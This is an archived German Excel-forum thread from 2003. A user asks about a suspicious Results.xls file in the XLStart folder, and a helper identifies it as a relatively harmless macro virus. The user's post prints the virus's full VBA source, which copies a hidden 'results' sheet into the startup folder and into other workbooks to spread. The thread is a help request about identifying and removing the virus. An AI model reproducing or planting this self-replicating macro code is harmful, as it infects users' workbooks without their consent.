Live-Forum - Die aktuellen Beiträge
Datum
Titel
24.04.2024 19:29:30
24.04.2024 18:49:56
Anzeige
Archiv - Navigation
264to268
Aktuelles Verzeichnis
Verzeichnis Index
Übersicht Verzeichnisse
Vorheriger Thread
Rückwärts Blättern
Nächster Thread
Vorwärts blättern
Anzeige
HERBERS
Excel-Forum (Archiv)
20+ Jahre Excel-Kompetenz: Von Anwendern, für Anwender
264to268
264to268
Aktuelles Verzeichnis
Verzeichnis Index
Verzeichnis Index
Übersicht Verzeichnisse
Inhaltsverzeichnis

Können sich Dateien/Makros gegenseitig stören?

Können sich Dateien/Makros gegenseitig stören?
06.06.2003 17:59:28
Rolf St.
Hallo Excel Experten!
Ich habe auf einem Laptop eine Excel Datei Zeitnahme mit Makros geöffnet. Diese Datei enthält auch Auto open Makros.

Ist es möglich das diese Datei durch folgendes Makro gestört wird und alle Auto open löscht? Wer kann mir folgendes Makro erklären?


Es gibt auf diesem Laptop eine Datei: C:\Dokumente und Einstellungen\Administrator\\Anwendungsdaten\Microsoft\Excel\XLStart\Results.xls


Diese Datei ist seit dem 15.1.2003 auf dem Laptop und enthält Makros, und zwar das auto_open und ein weiteres, ck_files

Das auto_open enthält nur eine Zeile:
Application.OnSheetActivate = "ck_files"

Hier der Inhalt diese ck_files-Makros:

Sub ck_files()

c$ = Application.StartupPath

m$ = Dir(c$ & "\" & "RESULTS.XLS")

If m$ = "RESULTS.XLS" Then p = 1 Else p = 0

If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0

whichfile = p + w * 10

Select Case whichfile

Case 10

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

Sheets("results").Visible = True

Sheets("results").Select

Sheets("results").Copy

With ActiveWorkbook

.Title = ""

.Subject = ""

.Author = ""

.Keywords = ""

.Comments = ""

End With

newname$ = ActiveWorkbook.Name

c4$ = CurDir()

ChDir Application.StartupPath

ActiveWindow.Visible = False

Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "RESULTS.XLS", FileFormat:=xlNormal _

, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _

False, CreateBackup:=False

ChDir c4$

Workbooks(n4$).Sheets("results").Visible = False

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "RESULTS.XLS!ck_files"

Case 1

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

p4$ = ActiveWorkbook.Path

s$ = Workbooks(n4$).Sheets(1).Name

If s$ <> "results" Then

Workbooks("RESULTS.XLS").Sheets("results").Copy before:=Workbooks(n4$).Sheets(1)

Workbooks(n4$).Sheets("results").Visible = False

Else

End If

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "RESULTS.XLS!ck_files"

Case Else

End Select

End Sub


Vielen Dank für eure Hilfe!

Tschüß
Rolf

4
Beiträge zum Forumthread
Beiträge zu diesem Forumthread

Betreff
Datum
Anwender
Anzeige
Re: Können sich Dateien/Makros gegenseitig stören?
06.06.2003 18:06:29
Nepumuk

Hallo Rolf,
das ist ein relativ harmloser Makrovirus. Den kannst du getrost löschen. Du musst aber alle Exceldateien durchsuchen , ob er sich nicht schon eingenistet hat.
Gruß
Nepumuk

Re: Können sich Dateien/Makros gegenseitig stören?
06.06.2003 18:12:50
Rolf St.

Hallo Nepumuk!

Vielen Dank für deine Hilfe!

Weißt du wie dieser Virus funktioniert?

Löscht es alle Auto open Dateien und trägt dort RESULTS.XLS ein?

Tschüß
Rolf

Re: Können sich Dateien/Makros gegenseitig stören?
06.06.2003 18:24:57
Nepumuk

Hallo Rolf,
das passiert aber nicht beabsichtigt, sondern zufällig, da er die auto_open Sequenzen zur Vermehrung benötigt. Auf die solltest du sowieso verzichten und auf Ereignisroutinen umstellen, da es sich dabei um ein Auslaufmodell handelt, das es nur noch gibt, um abwärtskompatibel zu sein.
Gruß
Nepumuk

Anzeige
Re: Können sich Dateien/Makros gegenseitig stören?
06.06.2003 21:11:08
Rolf St.

Hallo Nepumuk!
Vielen Dank für deine Hilfe!

Tschüß
Rolf

300 Forumthreads zu ähnlichen Themen

Anzeige
Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige
Anzeige
Anzeige